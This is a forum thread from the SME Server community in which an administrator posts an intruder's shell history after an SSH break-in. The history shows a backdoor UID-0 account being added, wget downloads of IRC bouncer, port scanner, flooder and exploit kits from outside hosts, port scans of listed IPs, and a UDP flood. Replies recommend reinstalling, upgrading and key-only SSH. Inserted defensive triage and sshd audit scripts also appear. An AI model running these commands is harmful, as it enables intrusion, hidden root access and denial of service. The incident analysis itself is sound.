Koozali.org: home of the SME Server
Contribs.org Forums => General Discussion => Topic started by: mindea on March 22, 2007, 05:23:49 PM
-
It looks like my server security was breached. I think due to a lazy password for an SSH login. But once in, I don't know how they managed to change the admin password, which was very secure. The root password was not changed. I'm curious as to what they were up to. Below is some of the command history.
$ /usr/sbin/useradd -u -0 -o -g -0 gepe
later, this appears
42 lynx www.cservice.undernet.org/live
43 w
44 ps x
45 cd .gepe
46 mkdir .gepe
47 cd .gepe
48 wget bnc-irc.trei.ro/linux/psybnc.tar.gz
49 tar xzvf psybnc.tar.gz
50 cd psybnc
51 make
52 cd -
53 wget http://whynot.saveitfree.com/linux.tgz
54 w
55 cd .gepe
56 ls
57 wget http://iasi-hack.sufx.net/strobe.zip
58 tar xzvf strobe.zip
59 cd strobe
60 ./strobe 85.204.247.250
61 ./strobe 89.108.81.36
62 ./strobe 194.84.153.50
63 ./strobe 195.199.197.243
64 ./strobe 81.183.216.57
65 w
66 ps x
67 cd .gepe
68 ls
69 cd psybnc
70 ./psybnc
71 ls
72 make
73 cd -
74 wget http://whynot.saveitfree.com/linux.tgz
75 tar xzvf linux.tgz
76 cd vlad/
77 ./bash
78 cd .gepe
79 cd strobe
80 ./strobe 217.10.221.145
81 w
82 ls
83 cd .gepe
84 ls
85 cd strobe
86 ./strobe 217.10.195.146
87 ./strobe 217.10.199.254
88 w
89 ls
90 cd .gepe
91 ls
92 wget http://cutitas.uv.ro/udp.tgz
93 tar xzvf udp.tgz
94 perl udp.pl 80.17.241.75 0 0
95 cd .gepe
96 ls
97 cd eplo
98 cd exploituri/
99 ./p
100 ls
101 ./p
102 ./I
103 id
104 ls
105 cd -
106 ls
107 cd
108 ls
109 cd .gepe
110 uname -a
111 wget help-bnc.octopis.com/do.tgz
112 tar xzvf do.tgz
113 ls
114 ./do
Then I looked in the mail directory. There is no entry for "gepe", but the root entry looked like this:
-rw-rw---- 1 root root 0 Mar 22 02:19 gepe
I have now set my hardware firewall (Sonicwall) to not allow any inbound or outbound traffic from the server. I'd like to avoid having to reinstall if I can figure out how to undo/disable whatever they may have installed. Plus, I'll reset all the passwords to a higher level and put very strict port rules on the firewall.
Any comments would be greatly appreciated. (The server is SME 6.01)
Thanks!
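Added triage example, not part of the original post or of SME Server: the quoted history shows two things a defender can check for directly on a suspect host, a second account with UID 0 (the "useradd -o" line lets a new user share root's UID) and a hidden tool directory under a home. The script below runs those checks, plus a grep for the history patterns seen above, against constructed sample files; the file paths, the dot-directory skip list and the sample contents are assumptions.

```shell
#!/bin/sh
# Added triage example for the history quoted above; it is not part of the original
# post or of SME Server. It checks for the persistence signs visible there: a second
# UID-0 account (the "useradd -o" line) and a hidden tool directory under a home.
# All sample files are constructed here to mimic the post; paths are assumptions.

# Print every account other than root whose UID is 0, one name per line.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print hidden directories directly under a home, skipping a few dot-directories
# a normal account is expected to have (the skip list is an assumption).
find_hidden_dirs() {
    for d in "$1"/.[!.]*; do
        [ -d "$d" ] || continue
        case "$(basename "$d")" in
            .ssh|.gnupg|.mozilla) ;;
            *) basename "$d" ;;
        esac
    done
}

# Print history lines that create accounts with a duplicate UID (-o) or fetch
# files from the network, the two kinds of action the quoted history shows.
flag_history() {
    grep -nE 'useradd .*-o|wget |curl ' "$1"
}

# --- constructed sample data ---------------------------------------------
work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

cat > "$work/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
admin:x:500:500:admin:/home/e-smith/admin:/bin/bash
gepe:x:0:0::/home/gepe:/bin/bash
EOF

mkdir -p "$work/home/.gepe/psybnc" "$work/home/.ssh"

cat > "$work/history" <<'EOF'
w
/usr/sbin/useradd -u 0 -o -g 0 gepe
mkdir .gepe
wget http://example.invalid/psybnc.tar.gz
ls
EOF

echo "UID 0 accounts besides root:"; find_uid0_accounts "$work/passwd"
echo "Hidden directories in home:";   find_hidden_dirs "$work/home"
echo "Suspicious history lines:";     flag_history "$work/history"
```

On a real host you would point the functions at /etc/passwd, each directory under /home and each user's shell history, and treat any hit as a reason to reload rather than clean, since a history file can be edited by the same person who wrote it.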
-
ANY COMMENT(s)...
Ehmm.. what about upgrading? And since you are suffering from a hack, I would suggest a clean install.
Somewhere in 2005 I was busy with some patches for 6.x because there were a lot of uncertain safety issues. I guess you missed that.
Even though I had all patches, they managed to breach the security of one server under my control by using a backdoor in awstats. No matter what you do, don't rely on safety too easily. Keeping things updated is the best you can do, and praying that they are not interested in trying to get into your server, because we might be called experts by the people around us. There is always a "better" person.
Learn from it and move on to higher grounds (SME 7)
my 2 cents
Harro
-
Now you know why you should upgrade your server to 7.1. Didn't you read the forum posts? SME 6 is not maintained anymore and you can thank yourself if you get hacked.
I would suggest that you format your server and install 7.1.2 with the latest updates, and implement SSH with public/private keys or disable it if you don't need it.
Don't bother with removing what they did. Install the newest SME version and patches and you're set. If you just fix what they did they can hack you again like they did. Having an obsolete server is never a good idea.
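Added example for the key-only SSH advice above; it is not from the thread or from SME Server. It puts a permissive sshd_config fragment beside a hardened one and adds a small audit function that reports which settings still allow password or root logins. Both config files are constructed; on SME Server the live sshd_config is generated from templates, so the hardened fragment is a statement of target settings rather than a file to edit by hand (assumption).

```shell
#!/bin/sh
# Added example for the key-only SSH advice above; not from the thread or from SME
# Server. It shows a permissive sshd_config beside a hardened one and a small audit
# function that reports which settings still allow password or root logins.
# Both config files are constructed; on SME Server the live sshd_config is generated
# from templates, so treat the hardened fragment as target settings (assumption).

# Print the value sshd would use for a keyword: OpenSSH takes the first occurrence
# of each keyword, so the first match wins. Keyword matching is case-insensitive.
sshd_value() {
    awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1"
}

# Print one finding per weak setting; prints nothing for a hardened file.
audit_sshd() {
    f=$1
    [ "$(sshd_value "$f" PasswordAuthentication)" = "no" ] \
        || echo "PasswordAuthentication is not 'no': password guessing remains possible"
    [ "$(sshd_value "$f" PermitRootLogin)" = "no" ] \
        || echo "PermitRootLogin is not 'no': root can be targeted directly"
    [ "$(sshd_value "$f" PermitEmptyPasswords)" != "yes" ] \
        || echo "PermitEmptyPasswords is 'yes'"
    [ "$(sshd_value "$f" PubkeyAuthentication)" != "no" ] \
        || echo "PubkeyAuthentication is 'no': key-only login is impossible"
}

# --- constructed sample configs ------------------------------------------
work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Permissive: any account, including root, can be reached with a guessed password.
cat > "$work/sshd_config.weak" <<'EOF'
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
EOF

# Hardened: keys only, no root login, a cap on authentication attempts.
cat > "$work/sshd_config.hard" <<'EOF'
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
EOF

for cfg in weak hard; do
    echo "== sshd_config.$cfg =="
    audit_sshd "$work/sshd_config.$cfg"
done
```

Run the audit against the real /etc/ssh/sshd_config before reopening port 22 on the firewall; an empty report means passwords are out of the picture and only accounts with an authorized key can log in.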
-
Please do NOT report security breaches on the forum. Please read before you post and you would have seen...
"Don't report security issues here - Contact security at contribs dot org"
I know this is SME Server 6 and obsolete but as a general rule please never report a security breach on a public forum.
-
Let me be the 2nd to say backup any important data and reload but not for the same reason given previously.
I say reload because even though you can see logs of what he did, you still can never be certain that he did not remove any log files. So even if you simply remove what you see he did to your machine, there could still be other files that can allow him to re-enter your machine. He could have simply removed/truncated the log so you could only see what he wanted you to see, so cut your losses and reload.
If possible you might as well take the opportunity to upgrade to the latest version. I just had a drive problem with my 6.1 server a few days ago, and in a week or two, after I decide on what hard drive/storage options, I will be upgrading to 7.1.
For people who simply see someone with an old, unsupported version of the software and say that he needs to upgrade: if you don't work in the IT field then you probably don't realize that it's not always that easy. While, as stated, knowing of the security risks it is the admin's own fault he got hacked, sometimes one can lose functionality when upgrading, so people will wait before upgrading. This is the reason I normally stay a version behind, to give the SME community time to get some of the custom contribs I like to have working with the latest version. A company a friend works for recently decided at the last minute not to perform a software upgrade because the new version did not include some of the same features the old software has that his company uses.
Last but not least, his hardware might not be capable of supporting the latest version or might run like crap, as I recently found when I had to replace my production system with my slower test system. Version 7.2 really kicks the crap out of a 600 MHz with 128 MB RAM when in the past this system worked great for what I needed.
-
SME 7 is at version 7.1.3, so this is not just one version behind but at least 3-4 versions, and is not a good thing to do. Yes, there can be problems, but I always update when people don't need the server (at night, 01:00) and it does the trick.
Not to mention that opening SSH without custom certificates is always a bad idea.